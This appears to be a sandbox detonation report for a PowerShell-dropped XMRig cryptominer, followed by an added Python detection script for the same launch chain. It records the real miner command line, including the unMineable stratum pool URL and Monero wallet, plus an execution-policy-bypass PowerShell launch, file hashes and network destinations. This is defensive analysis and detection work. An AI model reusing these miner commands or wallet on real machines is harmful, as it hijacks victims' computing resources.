memory/4556-74-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-75-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-76-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-77-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-78-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-79-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-80-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
298s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3096 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3096 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
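The Windows 10 and 11 runs in this report all show the same chain: powershell.exe started with -ExecutionPolicy bypass on a .ps1 in %TEMP%, the dropped xmrig.exe launched from %TEMP% with a stratum+ssl pool URL, a 95-character Monero address and an unMineable worker name, and xmrig.exe then enabling SeLockMemoryPrivilege (the huge-pages request RandomX miners make). The Python below is an added example of turning those observations into a detection; it is not code from the sandbox, from XMRig or from the sample. It assumes Sysmon Event ID 1 and Security Event ID 4703 field names for the log source; the PIDs and command lines of the two real processes come from this run, while the explorer.exe parent, the sqlservr.exe and svchost.exe control events, the score weights and the SQL Server allowlist are constructed.

```python
"""Detection for the launch chain in this report: powershell.exe (-ExecutionPolicy bypass)
starts xmrig.exe from %TEMP% with a stratum pool URL, and xmrig.exe then enables
SeLockMemoryPrivilege. Event shapes follow Sysmon ID 1 and Security ID 4703 (assumption)."""
import re
from urllib.parse import urlsplit

# A standard Monero address is 95 base58 characters beginning with '4'.
XMR_ADDRESS = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
MINER_ALGOS = {"rx", "rx/0", "randomx", "cn", "cn/r", "kawpow", "ethash", "ghostrider"}
OPT_NAMES = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
             "-a": "algo", "--algo": "algo", "-p": "pass", "--pass": "pass"}
# Image prefixes that legitimately hold SeLockMemoryPrivilege (assumption; tune per estate).
LOCK_MEMORY_ALLOWLIST = ("c:\\program files\\microsoft sql server\\",)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_miner_args(cmdline):
    """Pull pool, algorithm and wallet out of an xmrig-style command line; None if no stratum URL."""
    toks, opts = tokenize(cmdline), {}
    for i, tok in enumerate(toks):
        if tok in OPT_NAMES and i + 1 < len(toks):
            opts[OPT_NAMES[tok]] = toks[i + 1]
        elif tok.startswith("--") and "=" in tok:
            name, val = tok.split("=", 1)
            if name in OPT_NAMES:
                opts[OPT_NAMES[name]] = val
    url = opts.get("url", "")
    if not url.startswith("stratum"):
        return None
    pool = urlsplit(url)
    user = opts.get("user", "")
    coin, _, rest = user.partition(":")          # unMineable form: COIN:ADDRESS.worker
    if not rest:                                 # plain ADDRESS.worker form
        coin, rest = "", user
    wallet, _, worker = rest.partition(".")
    return {"scheme": pool.scheme, "pool_host": pool.hostname, "pool_port": pool.port,
            "algo": opts.get("algo", ""), "coin": coin, "wallet": wallet, "worker": worker,
            "wallet_looks_xmr": bool(XMR_ADDRESS.match(wallet))}


def score_process_event(ev):
    """Score a process-creation event; returns (score, reasons, parsed miner args or None)."""
    score, reasons = 0, []
    miner = parse_miner_args(ev.get("CommandLine", ""))
    if miner:
        score += 60
        reasons.append(f"stratum pool {miner['pool_host']}:{miner['pool_port']}")
        if miner["algo"].lower() in MINER_ALGOS:
            score += 10
            reasons.append(f"miner algorithm flag {miner['algo']}")
        if miner["wallet_looks_xmr"]:
            score += 20
            reasons.append("Monero wallet address in -u")
    if "\\appdata\\local\\temp\\" in ev.get("Image", "").lower():
        score += 10
        reasons.append("image runs from %TEMP%")
    parent = ev.get("ParentCommandLine", "").lower()
    if "powershell" in parent and re.search(r"-e\w*\s+bypass", parent):
        score += 10
        reasons.append("parent is PowerShell with execution policy bypass")
    return score, reasons, miner


def score_privilege_event(ev):
    """Score a 'user right adjusted' event: SeLockMemoryPrivilege outside the allowlist."""
    proc = ev.get("ProcessName", "").lower()
    if "SeLockMemoryPrivilege" not in ev.get("EnabledPrivilegeList", ""):
        return 0, [], None
    if proc.startswith(LOCK_MEMORY_ALLOWLIST):
        return 0, [], None
    return 40, ["SeLockMemoryPrivilege enabled (huge-pages request typical of RandomX miners)"], None


def detect(events, threshold=50):
    """Correlate scores per ProcessId across both event types; alert when the sum reaches threshold."""
    per_pid = {}
    for ev in events:
        scorer = score_privilege_event if ev.get("EventID") == 4703 else score_process_event
        score, reasons, miner = scorer(ev)
        pid = ev.get("ProcessId")
        entry = per_pid.setdefault(pid, {"ProcessId": pid, "score": 0, "reasons": [], "miner": None})
        entry["score"] += score
        entry["reasons"].extend(reasons)
        entry["miner"] = entry["miner"] or miner
    return [e for e in per_pid.values() if e["score"] >= threshold]


PS_CMD = r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"'
XMRIG_EXE = r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe"
XMRIG_CMD = (f'"{XMRIG_EXE}" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXm'
             'SkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x')
# Constructed events: PIDs 3096/1084 and both command lines are from this run; the explorer.exe
# parent and the sqlservr.exe / svchost.exe control events (and their PIDs) are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3096, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": PS_CMD, "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 1084, "Image": XMRIG_EXE, "CommandLine": XMRIG_CMD, "ParentCommandLine": PS_CMD},
    {"EventID": 4703, "ProcessId": 1084, "ProcessName": XMRIG_EXE, "EnabledPrivilegeList": "SeLockMemoryPrivilege"},
    {"EventID": 4703, "ProcessId": 2520, "ProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "EnabledPrivilegeList": "SeLockMemoryPrivilege"},
    {"EventID": 1, "ProcessId": 844, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p", "ParentCommandLine": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ProcessId"], alert["score"], alert["reasons"], alert["miner"])
```

The stratum URL carries most of the weight on purpose: a PowerShell parent with -ExecutionPolicy bypass or a binary in %TEMP% is routine in admin tooling, and SeLockMemoryPrivilege is held legitimately by database engines, so those only corroborate. Correlating by ProcessId is only valid within one boot session, since PIDs are reused; a production rule should key on the process GUID or start time as well.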
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3096-0-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mymcrsga.53d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3096-9-0x00000258B0010000-0x00000258B0032000-memory.dmp
memory/3096-10-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-11-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-12-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-13-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-14-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-15-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-18-0x00000258B03E0000-0x00000258B03EA000-memory.dmp
memory/3096-17-0x00000258B03F0000-0x00000258B0402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1084-49-0x0000016404C30000-0x0000016404C50000-memory.dmp
memory/1084-50-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-52-0x0000016406530000-0x0000016406550000-memory.dmp
memory/1084-51-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-53-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-55-0x0000016499120000-0x0000016499140000-memory.dmp
memory/1084-54-0x0000016499140000-0x0000016499160000-memory.dmp
memory/1084-56-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-57-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-58-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-60-0x0000016499120000-0x0000016499140000-memory.dmp
memory/1084-59-0x0000016499140000-0x0000016499160000-memory.dmp
memory/1084-61-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-62-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-63-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-64-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-65-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-66-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-67-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-68-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-69-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-70-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-71-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-72-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-73-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-74-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-75-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-76-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-77-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-78-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-79-0x00007FF61C950000-0x00007FF61D583000-memory.dmp